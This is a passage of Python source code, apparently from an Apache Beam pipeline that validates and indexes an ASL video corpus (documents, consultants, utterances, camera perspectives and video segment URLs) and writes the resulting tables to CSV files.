if doc_fname is None or len(doc_fname)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} video_doc_participant_utterance_camera_perspective_with_ids_pcoll_row_tpl {vdpucpwiprt} has no associated corpus document filename")
return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
participant_name = vdpucpwiprt[0][1]
if participant_name is None or len(participant_name)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} video_doc_participant_utterance_camera_perspective_with_ids_pcoll_row_tpl {vdpucpwiprt} has no associated participant name")
return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
document_participant_with_ids_mapping = vdpucpwiprt[1]['document_participant_with_ids_mapping']
doc_participant_to_utterance_video_cameraperspective_mapping = vdpucpwiprt[1]['doc_participant_to_utterance_video_cameraperspective_mapping']
validated_results = []
# there should always only be ONE (<doc id>, <asl consultant id>) per mapping
doc_id = None
asl_consultant_id = None
if len(document_participant_with_ids_mapping) > 0:
not_unique = False
for document_participant_with_ids_mapping_instance in document_participant_with_ids_mapping:
_doc_id = document_participant_with_ids_mapping_instance[0]
_asl_consultant_id = document_participant_with_ids_mapping_instance[1]
if doc_id is None:
doc_id = _doc_id
else:
if _doc_id != doc_id:
not_unique = True
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} doc_id is not unique! It has doc ids: {doc_id} and {_doc_id}")
return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
if asl_consultant_id is None:
asl_consultant_id = _asl_consultant_id
else:
if _asl_consultant_id != asl_consultant_id:
not_unique = True
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} asl_consultant_id is not unique! It has doc ids: {asl_consultant_id} and {_asl_consultant_id}")
return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
else:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} has no document_participant_with_ids_mapping!")
return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
if len(doc_participant_to_utterance_video_cameraperspective_mapping) > 0:
not_unique = False
for doc_participant_to_utterance_video_cameraperspective_mapping_instance in doc_participant_to_utterance_video_cameraperspective_mapping:
# (<utterance seq id>, <video fname>, <camera perspective>)
_utterance_seq_id = doc_participant_to_utterance_video_cameraperspective_mapping_instance[0]
if _utterance_seq_id is None or not isinstance(_utterance_seq_id, int) or _utterance_seq_id<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} has an invalid utterance seq id: {_utterance_seq_id}")
return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
_media_fname = doc_participant_to_utterance_video_cameraperspective_mapping_instance[1]
if _media_fname is None or len(_media_fname)==0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} has an empty (or None) media filename")
return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
_camera_perspective = doc_participant_to_utterance_video_cameraperspective_mapping_instance[2]
if _camera_perspective is None or not isinstance(_camera_perspective, int) or _camera_perspective<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} has an invalid camera perspective: {_camera_perspective}")
return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
# ((<doc id>, <asl consultant id>), (<doc filename>, <participant name>, <utterance seq id>, <media filename>, <camera perspective>))
validated_results.append(
(
(doc_id, asl_consultant_id),
(doc_fname, participant_name, _utterance_seq_id, _media_fname, _camera_perspective)
)
)
else:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} has no doc_participant_to_utterance_video_cameraperspective_mapping entries")
return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
return validated_results
def validate_preprocess_target_video_to_segment_mapping(target_video_to_segment_mapping_tpl):
"""
target_video_to_segment_mapping_tpl:
# (
# <target video fname>,
# {
# 'doc_consultant_camera_perspective_mapping': [
# (
# <doc id>, # <target video fname> can occur in more than one document
# <asl consultant id>, # must map 1-to-1 to <target video fname>
# <camera perspective> # must map 1-to-1 to <target video fname>
# ) # there can be more than one
# ],
# 'video_to_segment_url_list_as_str': [<target video segment url list (as string)>] should be only one string
# }
# )
return:
listof(
(
(<corpus doc id>, <asl consultant id>, <camera perspective>, <seg seq id>), # key
(<target video fname>, <seg filename>, <seg url>)) # data
)
)
"""
validated_results = []
target_video_fname = target_video_to_segment_mapping_tpl[0]
doc_consultant_camera_perspective_mapping = list(set(target_video_to_segment_mapping_tpl[1]['doc_consultant_camera_perspective_mapping']))
if len(doc_consultant_camera_perspective_mapping) == 0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} doc_consultant_camera_perspective_mapping is empty")
return target_video_to_segment_mapping_tpl # note that this will cause an exception in beam since the shape will not match other validated rows
video_to_segment_url_list_as_str = list(set(target_video_to_segment_mapping_tpl[1]['video_to_segment_url_list_as_str']))
if len(video_to_segment_url_list_as_str) != 1:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} segment list is either empty or not unique: {video_to_segment_url_list_as_str}")
return target_video_to_segment_mapping_tpl # note that this will cause an exception in beam since the shape will not match other validated rows
video_to_segment_url_list_as_str = video_to_segment_url_list_as_str[0]
segments = []
asl_consultant_id = None
multiple_asl_consultants = []
camera_perspective = None
multiple_camera_perspectives = []
for seg_seg_id, seg_url in enumerate(video_to_segment_url_list_as_str.split(';')):
seg_fname = str(seg_url).split('/')[-1]
for doc_consultant_camera_perspective_mapping_instance in doc_consultant_camera_perspective_mapping:
_doc_id = doc_consultant_camera_perspective_mapping_instance[0]
_asl_consultant_id = doc_consultant_camera_perspective_mapping_instance[1]
if _asl_consultant_id not in multiple_asl_consultants:
multiple_asl_consultants.append(_asl_consultant_id)
_camera_perspective = doc_consultant_camera_perspective_mapping_instance[2]
if _camera_perspective not in multiple_camera_perspectives:
multiple_camera_perspectives.append(_camera_perspective)
validated_results.append(
(
(
_doc_id,
_asl_consultant_id,
_camera_perspective,
seg_seg_id
),
(
target_video_fname,
seg_fname,
seg_url
)
)
)
if len(multiple_asl_consultants) != 1:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} asl consultant is either either empty or not unique: {multiple_asl_consultants}")
return target_video_to_segment_mapping_tpl # note that this will cause an exception in beam since the shape will not match other validated rows
if len(multiple_camera_perspectives) != 1:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} camera perspective is either either empty or not unique: {multiple_camera_perspectives}")
return target_video_to_segment_mapping_tpl # note that this will cause an exception in beam since the shape will not match other validated rows
return validated_results
def pl__6__create_document_asl_consultant_target_video_index_pcolls(
ss_parsed_xmldb_pcoll,
document_asl_consultant_index_schemad_pcoll,
full_target_vid_index_schemad_pcoll,
d_pl_options
):
# get list of target video infos
target_video_doc_participant_utterance_mapping = (
ss_parsed_xmldb_pcoll
| "Beam PL: get doc filename, participant name, utterance seq id associated with this target video, keyed by target video filename" >> beam.Map(
lambda ss_parsed_xmldb_pcoll_row_dict: [
( # key
doc_participant_utterance_video_tpl[3], # <target video filename>
(
doc_participant_utterance_video_tpl[0], # <corpus doc filename>
doc_participant_utterance_video_tpl[1], # <participant name>
doc_participant_utterance_video_tpl[2] # <utterance seq id>
)
) for doc_participant_utterance_video_tpl in [
(
ss_parsed_xmldb_pcoll_row_dict['CORPUS_DOCUMENT_FILENAME'],
d_participant['PARTICIPANT_NAME'],
utterance_seq_id,
str(urllib.parse.quote(d_target_video['TARGET_VIDEO_FNAME'])) # there may be spaces!
) for d_participant in ss_parsed_xmldb_pcoll_row_dict['PARTICIPANT_SEQUENCE']
for utterance_seq_id, d_utterance in enumerate(d_participant['UTTERANCE_SEQUENCE'])
for d_target_video in d_utterance['TARGET_VIDEO_SEQUENCE']
]
]
) # outputs pcoll with each row list of (<video filename>, (<corpus doc filename>, <participant name>, <utterance seq id>))
| "Beam PL: 'explode' list of target_video_doc_participant_utterance_mapping tuples" >> beam.FlatMap(lambda list_target_video_doc_participant_utterance_mapping_mapping_tpl: list_target_video_doc_participant_utterance_mapping_mapping_tpl)
| "Beam PL: select distinct list_target_video_doc_participant_utterance_mapping_tpl tuples" >> beam.Distinct()
# debug
# | "Beam PL: print pl__6__create_document_asl_consultant_target_video_index_pcolls result" >> beam.ParDo(beam__common.PipelinePcollPrinter("pl__6__create_document_asl_consultant_target_video_index_pcolls result"))
)
# now extract distinct target video fnames from media_doc_participant_mapping
target_video_list_pcoll = (
target_video_doc_participant_utterance_mapping
| "Beam PL: extract media fname" >> beam.Map(lambda target_video_doc_participant_utterance_mapping_row_tpl: target_video_doc_participant_utterance_mapping_row_tpl[0])
| "Beam PL: select distinct target video filenames" >> beam.Distinct()
# debug
# | "Beam PL: print media associated with this ss_parsed_xmldb" >> beam.ParDo(beam__common.PipelinePcollPrinter("\tmedia"))
)
target_full_target_vid_index_mapping = (
full_target_vid_index_schemad_pcoll
| "Beam PL: filter matching rows from vid index" >> beam.Filter(
lambda vid_index_entry, matching_target_video_fnames: vid_index_entry.target_video_filename in matching_target_video_fnames,
matching_target_video_fnames=beam.pvalue.AsIter(target_video_list_pcoll),
)
| "Beam PL: key matching vid index entries by target vid fname" >> beam.Map(
lambda matching_target_vid_index_entry: (matching_target_vid_index_entry.target_video_filename, matching_target_vid_index_entry)
)
# debug
# | "Beam PL: print vid index entries matching media associated with this ss_parsed_xmldb" >> beam.ParDo(beam__common.PipelinePcollPrinter("\tmatching vid index media"))
)
# merge doc, participant, and camera perspective keyed by media filename
# this pcoll will be used to produce final pcolls:
# document_asl_consultant_target_video_index_schemad_pcoll
target_video_fname_to_merged_doc_participant_utterance_target_full_target_vid_index_mapping = (
({
'target_video_doc_participant_utterance_mapping': target_video_doc_participant_utterance_mapping,
'target_full_target_vid_index_mapping': target_full_target_vid_index_mapping
})
| "Beam PL: merge target_video_doc_participant_utterance_mapping and target_full_target_vid_index_mapping" >> beam.CoGroupByKey()
# the above produces tuples in the form:
# (
# <target video fname>, # key
# {
# 'target_video_doc_participant_utterance_mapping': [
# (
# <corpus doc filename>,
# <participant_name>,
# <utterance seq id>
# )
# ],
# 'target_video_camera_perspective_mapping': [
# beam.Row(
# target_video_filename=<target_video_filename>,
# video_seq_id=<video_seq_id>,
# perspective_cam_id=<perspective_cam_id>,
# compressed_mov_url=<compressed_mov_url>,
# compressed_mov_url=<compressed_mov_url>,
# uncompressed_avi_url=<uncompressed_avi_url>,
# uncompressed_avi_mirror_1_url=<uncompressed_avi_mirror_1_url>,
# <uncompressed_avi_mirror_2_url>
# )
# ]
# }
# )
# debug
# | "Beam PL: print target_video_fname_to_merged_doc_participant_utterance_target_full_target_vid_index_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("target_video_fname_to_merged_doc_participant_utterance_target_full_target_vid_index_mapping entry"))
)
doc_participant_to_utterance_video_cameraperspective_mapping = (
target_video_fname_to_merged_doc_participant_utterance_target_full_target_vid_index_mapping
| "Beam PL: validate/preprocess doc_participant_to_utterance_video_cameraperspective_mapping" >> beam.FlatMap(validate_preprocess_doc_participant_to_utterance_video_cameraperspective_mapping)
)
# now use document_asl_consultant_index_schemad_pcoll in order to associate doc id and asl consultant id:
document_participant_with_ids_mapping = (
document_asl_consultant_index_schemad_pcoll
| "Beam PL: transform document_asl_consultant_index_schemad_pcoll rows into ((<document fname>, <participant name>), (<document id>, <asl consultant id>))" >> beam.Map(
lambda document_asl_consultant_index_schemad_pcoll_row: (
(document_asl_consultant_index_schemad_pcoll_row.Filename, document_asl_consultant_index_schemad_pcoll_row.ParticipantName),
(document_asl_consultant_index_schemad_pcoll_row.DocumentID, document_asl_consultant_index_schemad_pcoll_row.ASLConsultantID)
)
)
)
# merge doc, participant, and camera perspective keyed by media filename
document_asl_consultant_target_video_utterance_index_schemad_pcoll = (
({
'document_participant_with_ids_mapping': document_participant_with_ids_mapping,
'doc_participant_to_utterance_video_cameraperspective_mapping': doc_participant_to_utterance_video_cameraperspective_mapping
})
| "Beam PL: merge document_participant_with_ids_mapping and doc_participant_to_utterance_video_cameraperspective_mapping" >> beam.CoGroupByKey()
# the above produces tuples in the form:
# (
# (<doc filename>, <participant name>), # key
# {
# 'document_participant_with_ids_mapping': [(<doc id>, <asl consultant id>)],
# 'doc_participant_to_utterance_video_cameraperspective_mapping': [(<utterance seq id>, <video fname>, <camera perspective>)]
# }
# )
# | "Beam PL: print merged document_participant_with_ids_mapping and doc_participant_to_utterance_video_cameraperspective_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("\tmerged document_participant_with_ids_mapping and doc_participant_to_utterance_video_cameraperspective_mapping entry"))
| "Beam PL: validate/preprocess video_doc_participant_utterance_camera_perspective_with_ids_pcoll" >> beam.FlatMap(validate_preprocess_video_doc_participant_utterance_camera_perspective_with_ids_pcoll_row_tpl)
# the above produces tuples in the form:
# ((<doc id>, <asl consultant id>), (<doc filename>, <participant name>, <utterance seq id>, <media filename>, <camera perspective>))
| "Beam PL: apply schema to create final document_asl_consultant_target_video_utterance_index_schemad_pcoll" >> beam.Map(
lambda document_asl_consultant_video_index_pcoll_row_tpl: beam.Row(
# SCHEMA_COL_NAMES__VIDEO_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'CameraPerspective',
# 'TargetVideoFilename'
# ]
DocumentID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][0]),
DocumentFileName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][0]),
ASLConsultantID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][1]),
ParticipantName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][1]),
UtteranceSequence=int(document_asl_consultant_video_index_pcoll_row_tpl[1][2]),
CameraPerspective=int(document_asl_consultant_video_index_pcoll_row_tpl[1][4]),
TargetVideoFilename=str(document_asl_consultant_video_index_pcoll_row_tpl[1][3])
)
)
# debug
# | "Beam PL: print document_asl_consultant_target_video_utterance_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter("document_asl_consultant_target_video_utterance_index_schemad_pcoll entry"))
)
target_video_fname_to_doc_consultant_camera_perspective_mapping = (
document_asl_consultant_target_video_utterance_index_schemad_pcoll
| "Beam PL: extract (<target video filename>, (<corpus doc id>, <asl consultant id>, <camera perspective>)) from document_asl_consultant_target_video_utterance_index_schemad_pcoll" >> beam.Map(
lambda document_asl_consultant_target_video_index_schemad_pcoll_row: (
document_asl_consultant_target_video_index_schemad_pcoll_row.TargetVideoFilename, # key
(
document_asl_consultant_target_video_index_schemad_pcoll_row.DocumentID,
document_asl_consultant_target_video_index_schemad_pcoll_row.ASLConsultantID,
document_asl_consultant_target_video_index_schemad_pcoll_row.CameraPerspective
)
)
)
)
target_video_to_segment_url_list = (
target_full_target_vid_index_mapping # (matching_target_vid_index_entry.target_video_filename, matching_target_vid_index_entry)
| "Beam PL: extract (<target video filename>, <segment video url list as string>) from full_target_vid_index_mapping" >> beam.Map(
lambda target_full_target_vid_index_mapping_row_tpl: (
target_full_target_vid_index_mapping_row_tpl[0],
target_full_target_vid_index_mapping_row_tpl[1].compressed_mov_url
)
)
)
document_target_video_segment_index_schemad_pcoll = (
({
'doc_consultant_camera_perspective_mapping': target_video_fname_to_doc_consultant_camera_perspective_mapping,
'video_to_segment_url_list_as_str': target_video_to_segment_url_list
})
| "Beam PL: merge doc_consultant_camera_perspective_mapping and video_to_segment_url_list_as_str" >> beam.CoGroupByKey()
# the above produces tuples of the form:
# (
# <target video fname>,
# {
# 'doc_consultant_camera_perspective_mapping': listof( (<doc id>, <asl consultant id>, <camera perspective>) ),
# 'video_to_segment_url_list_as_str': listof( (<target video segment url list (as string)>) )
# }
# )
| "Beam PL: validate/preprocess target_video_to_segment_mapping_pcoll" >> beam.FlatMap(validate_preprocess_target_video_to_segment_mapping)
# the above produces tuples of the form:
# (
# (<corpus doc id>, <asl consultant id>, <camera perspective>, <seg seq id>), # key
# (<target video fname>, <seg filename>, <seg url>)) # data
# )
| "Beam PL: apply schema to create final target_video_segment_index_pcoll" >> beam.Map(
lambda target_video_to_segment_mapping_pcoll_row_tpl: beam.Row(
# SCHEMA_COL_NAMES__VIDEO_SEGMENT_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'CameraPerspective',
# 'SegmentSequence',
# 'SegmentVideoFilename',
# 'URL'
# ]
DocumentID=int(target_video_to_segment_mapping_pcoll_row_tpl[0][0]),
ASLConsultantID=int(target_video_to_segment_mapping_pcoll_row_tpl[0][1]),
CameraPerspective=int(target_video_to_segment_mapping_pcoll_row_tpl[0][2]),
TargetVideoFilename=str(target_video_to_segment_mapping_pcoll_row_tpl[1][0]),
SegmentSequence=int(target_video_to_segment_mapping_pcoll_row_tpl[0][3]),
SegmentVideoFilename=str(target_video_to_segment_mapping_pcoll_row_tpl[1][1]),
URL=str(target_video_to_segment_mapping_pcoll_row_tpl[1][2])
)
)
# debug
# | "Beam PL: print target_video_to_segment_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("target_video_to_segment_mapping entry"))
)
return document_asl_consultant_target_video_utterance_index_schemad_pcoll, document_target_video_segment_index_schemad_pcoll
def pl__7__write_document_asl_consultant_target_video_index_csv(document_asl_consultant_target_video_utterance_index_schemad_pcoll, d_pl_options):
"""
document_asl_consultant_target_video_utterance_index_schemad_pcoll:
beam.Row(
# SCHEMA_COL_NAMES__VIDEO_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'CameraPerspective',
# 'TargetVideoFilename'
# ]
DocumentID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][0]),
DocumentFileName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][0]),
ASLConsultantID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][1]),
ParticipantName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][1]),
UtteranceSequence=int(document_asl_consultant_video_index_pcoll_row_tpl[1][2]),
CameraPerspective=int(document_asl_consultant_video_index_pcoll_row_tpl[1][4]),
TargetVideoFilename=str(document_asl_consultant_video_index_pcoll_row_tpl[1][3])
)
"""
distinct_document_asl_consultant_video_index_pcoll = (
document_asl_consultant_target_video_utterance_index_schemad_pcoll
| "Beam PL: extract SCHEMA_COL_NAMES__VIDEO_DS columns from document_asl_consultant_target_video_index_schemad_pcoll" >> beam.Map(
lambda document_asl_consultant_target_video_index_schemad_pcoll_row: (
document_asl_consultant_target_video_index_schemad_pcoll_row.DocumentID,
document_asl_consultant_target_video_index_schemad_pcoll_row.ASLConsultantID,
document_asl_consultant_target_video_index_schemad_pcoll_row.CameraPerspective,
document_asl_consultant_target_video_index_schemad_pcoll_row.TargetVideoFilename,
# document_asl_consultant_target_video_index_schemad_pcoll_row.FrameSequence,
# document_asl_consultant_target_video_index_schemad_pcoll_row.FramePath,
document_asl_consultant_target_video_index_schemad_pcoll_row.UtteranceSequence
)
)
| "Beam PL: select distinct document_asl_consultant_video_index rows" >> beam.Distinct()
)
sorted_distinct_document_asl_consultant_video_index_pcoll = beam__common.pl__X__sort_pcoll(
distinct_document_asl_consultant_video_index_pcoll,
pcoll_label="distinct_document_asl_consultant_video_index"
)
sorted_distinct_document_asl_consultant_video_index_csv_rows_pcoll = (
sorted_distinct_document_asl_consultant_video_index_pcoll
| "Beam PL: apply minimal schema to create final document_asl_consultant_target_video_index_schemad_pcoll of distinct rows" >> beam.Map(
lambda distinct_document_asl_consultant_video_index_row: beam.Row(
DocumentID=int(distinct_document_asl_consultant_video_index_row[0]),
ASLConsultantID=int(distinct_document_asl_consultant_video_index_row[1]),
CameraPerspective=int(distinct_document_asl_consultant_video_index_row[2]),
Filename=str(distinct_document_asl_consultant_video_index_row[3])
)
)
| beam.Map(lambda distinct_document_asl_consultant_target_video_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(distinct_document_asl_consultant_target_video_index_schemad_pcoll_row))
)
distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll = (
document_asl_consultant_target_video_utterance_index_schemad_pcoll
| "Beam PL: extract columns for distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll" >> beam.Map(
lambda document_asl_consultant_target_video_utterance_index_schemad_pcoll_row: (
document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.DocumentID,
document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.ASLConsultantID,
document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.CameraPerspective,
document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.TargetVideoFilename,
# document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.FrameSequence,
# document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.FramePath,
document_asl_consultant_target_video_utterance_index_schemad_pcoll_row.UtteranceSequence
)
)
| "Beam PL: select distinct document_asl_consultant_target_video_utterance_index rows" >> beam.Distinct()
)
sorted_distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll = beam__common.pl__X__sort_pcoll(
distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll,
pcoll_label="distinct_document_asl_consultant_target_video_utterance_index"
)
sorted_distinct_document_asl_consultant_target_video_utterance_index_csv_rows_pcoll = (
sorted_distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll
| "Beam PL: apply minimal schema to create final distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll of distinct rows" >> beam.Map(
lambda distinct_document_asl_consultant_target_video_utterance_index_row: beam.Row(
DocumentID=int(distinct_document_asl_consultant_target_video_utterance_index_row[0]),
ASLConsultantID=int(distinct_document_asl_consultant_target_video_utterance_index_row[1]),
CameraPerspective=int(distinct_document_asl_consultant_target_video_utterance_index_row[2]),
TargetVideoFilename=str(distinct_document_asl_consultant_target_video_utterance_index_row[3]),
# FrameSequence=int(distinct_document_asl_consultant_target_video_utterance_index_row[4]),
# FramePath=str(distinct_document_asl_consultant_target_video_utterance_index_row[4]),
UtteranceSequence=int(distinct_document_asl_consultant_target_video_utterance_index_row[4])
)
)
| beam.Map(lambda distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(distinct_document_asl_consultant_target_video_utterance_index_schemad_pcoll_row))
)
return beam__common.pl__X__write_pcoll_to_csv( # document_asl_consultant_video_index_csv_path
sorted_distinct_document_asl_consultant_video_index_csv_rows_pcoll,
"DOCUMENT-ASLCONSULTANT-VIDEO-INDEX",
fidscs_globals.VIDEO_DS_FNAME,
fidscs_globals.SCHEMA_COL_NAMES__VIDEO_DS,
d_pl_options
), beam__common.pl__X__write_pcoll_to_csv(
sorted_distinct_document_asl_consultant_target_video_utterance_index_csv_rows_pcoll,
"DOCUMENT-ASLCONSULTANT-VIDEO-UTTERANCE-INDEX",
fidscs_globals.VIDEO_UTTERANCE_DS_FNAME,
['DocumentID', 'ASLConsultantID', 'CameraPerspective', 'TargetVideoFilename', 'UtteranceSequence'],
d_pl_options
)
def pl__7__write_document_asl_consultant_utterance_video_index_csv(document_asl_consultant_target_video_index_schemad_pcoll, d_pl_options):
distinct_document_asl_consultant_utterance_video_index_pcoll = (
document_asl_consultant_target_video_index_schemad_pcoll
# beam.Row(
# # SCHEMA_COL_NAMES__VIDEO_DS = [
# # 'DocumentID',
# # 'ASLConsultantID',
# # 'CameraPerspective',
# # 'TargetVideoFilename'
# # ]
# DocumentID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][0]),
# DocumentFileName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][0]),
# ASLConsultantID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][1]),
# ParticipantName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][1]),
# UtteranceSequence=int(document_asl_consultant_video_index_pcoll_row_tpl[1][2]),
# CameraPerspective=int(document_asl_consultant_video_index_pcoll_row_tpl[1][4]),
# TargetVideoFilename=str(document_asl_consultant_video_index_pcoll_row_tpl[1][3])
# )
| "Beam PL: extract (DocumentID, ASLConsultantID, UtteranceSequence, CameraPerspective) from document_asl_consultant_target_video_index_schemad_pcoll" >> beam.Map(
lambda document_asl_consultant_target_video_index_schemad_pcoll_row: (
document_asl_consultant_target_video_index_schemad_pcoll_row.DocumentID,
document_asl_consultant_target_video_index_schemad_pcoll_row.ASLConsultantID,
document_asl_consultant_target_video_index_schemad_pcoll_row.TargetVideoFilename, # added
document_asl_consultant_target_video_index_schemad_pcoll_row.UtteranceSequence,
document_asl_consultant_target_video_index_schemad_pcoll_row.CameraPerspective
)
)
| "Beam PL: select distinct (DocumentID, ASLConsultantID, UtteranceSequence, CameraPerspective) extracted from document_asl_consultant_target_video_index_schemad_pcoll" >> beam.Distinct()
)
sorted_distinct_document_asl_consultant_utterance_video_index_pcoll = beam__common.pl__X__sort_pcoll(
distinct_document_asl_consultant_utterance_video_index_pcoll,
pcoll_label="distinct_document_asl_consultant_utterance_video_index"
)
sorted_distinct_document_asl_consultant_utterance_video_index_csv_rows_pcoll = (
sorted_distinct_document_asl_consultant_utterance_video_index_pcoll
| "Beam PL: apply schema to create final document_asl_consultant_utterance_video_index_schemad_pcoll" >> beam.Map(
lambda distinct_document_asl_consultant_video_index_row: beam.Row(
# SCHEMA_COL_NAMES__UTTERANCE_VIDEO_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'TargetVideoFilename',
# 'UtteranceSequence',
# 'CameraPerspective'
# ]
DocumentID=int(distinct_document_asl_consultant_video_index_row[0]),
ASLConsultantID=int(distinct_document_asl_consultant_video_index_row[1]),
TargetVideoFilename=str(distinct_document_asl_consultant_video_index_row[2]),
UtteranceSequence=int(distinct_document_asl_consultant_video_index_row[3]),
CameraPerspective=int(distinct_document_asl_consultant_video_index_row[4])
)
)
| beam.Map(lambda distinct_document_asl_consultant_utterance_video_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(distinct_document_asl_consultant_utterance_video_index_schemad_pcoll_row))
)
return beam__common.pl__X__write_pcoll_to_csv(
sorted_distinct_document_asl_consultant_utterance_video_index_csv_rows_pcoll,
"DOCUMENT-ASLCONSULTANT-UTTERANCE-TARGETVIDEO-INDEX",
fidscs_globals.UTTERANCE_VIDEO_DS_FNAME,
fidscs_globals.SCHEMA_COL_NAMES__UTTERANCE_VIDEO_DS,
d_pl_options
) # document_asl_consultant_utterance_video_index_csv_path
def pl__7__write_document_target_video_segment_index_csv(document_target_video_segment_index_schemad_pcoll, d_pl_options):
distinct_target_video_segment_index_pcoll = (
document_target_video_segment_index_schemad_pcoll
| "Beam PL: extract (DocumentID, ASLConsultantID, CameraPerspective, TargetVideoFilename, SegmentSequence, SegmentVideoFilename, URL) from document_target_video_segment_index_schemad_pcoll" >> beam.Map(
lambda document_target_video_segment_index_schemad_pcoll_row: (
document_target_video_segment_index_schemad_pcoll_row.DocumentID,
document_target_video_segment_index_schemad_pcoll_row.ASLConsultantID,
document_target_video_segment_index_schemad_pcoll_row.CameraPerspective,
document_target_video_segment_index_schemad_pcoll_row.TargetVideoFilename,
document_target_video_segment_index_schemad_pcoll_row.SegmentSequence,
document_target_video_segment_index_schemad_pcoll_row.SegmentVideoFilename,
document_target_video_segment_index_schemad_pcoll_row.URL,
)
)
| "Beam PL: select distinct (DocumentID, ASLConsultantID, CameraPerspective, TargetVideoFilename, SegmentSequence, SegmentVideoFilename, URL) extracted from target_video_segment_index_pcoll" >> beam.Distinct()
)
sorted_distinct_target_video_segment_index_pcoll = beam__common.pl__X__sort_pcoll(
distinct_target_video_segment_index_pcoll,
pcoll_label="target_video_segment_index"
)
sorted_target_video_segment_index_schemad_pcoll = (
sorted_distinct_target_video_segment_index_pcoll
| "Beam PL: re-apply schema to create final sorted_target_video_segment_index_schemad_pcoll" >> beam.Map(
lambda sorted_distinct_target_video_segment_index_tpl: beam.Row(
# SCHEMA_COL_NAMES__VIDEO_SEGMENT_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'CameraPerspective',
# 'TargetVideoFilename',
# 'SegmentSequence',
# 'SegmentVideoFilename',
# 'URL'
# ]
DocumentID=sorted_distinct_target_video_segment_index_tpl[0],
ASLConsultantID=sorted_distinct_target_video_segment_index_tpl[1],
CameraPerspective=sorted_distinct_target_video_segment_index_tpl[2],
TargetVideoFilename=sorted_distinct_target_video_segment_index_tpl[3],
SegmentSequence=sorted_distinct_target_video_segment_index_tpl[4],
SegmentVideoFilename=sorted_distinct_target_video_segment_index_tpl[5],
URL=sorted_distinct_target_video_segment_index_tpl[6]
)
)
| beam.Map(lambda sorted_target_video_segment_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(sorted_target_video_segment_index_schemad_pcoll_row))
)
return beam__common.pl__X__write_pcoll_to_csv(
sorted_target_video_segment_index_schemad_pcoll,
"DOCUMENT-ASLCONSULTANT-TARGETVIDEO-SEGMENT-INDEX",
fidscs_globals.VIDEO_SEGMENT_DS_FNAME,
fidscs_globals.SCHEMA_COL_NAMES__VIDEO_SEGMENT_DS,
d_pl_options
) # target_video_segment_index_csv_path
def pl__4__debug_print_signstream_db(ss_parsed_xmldb_pcoll):
return (
ss_parsed_xmldb_pcoll
| "Beam PL: debug print parsed signstream xmldb" >> beam.Map(debug_print_signstream_db)
)
def pl__3__parallel_download_videos(vid_index_schemad_pcoll, d_pl_options, n_partitions=8):
vid_index_schemad_pcoll_download_partitions = (
vid_index_schemad_pcoll
| "Beam PL: partition schemad video index for download parallelization" >> beam.Partition(
lambda vid_index_row, num_partitions: random.randint(0,num_partitions-1),
n_partitions
)
)
partition_download_results = [None for i in range(n_partitions)]
for i, vid_index_schemad_pcoll_partition in enumerate(vid_index_schemad_pcoll_download_partitions):
p_label = f"p{i+1}"
p_label_indented = f"\t{p_label}"
p_dl_results = (
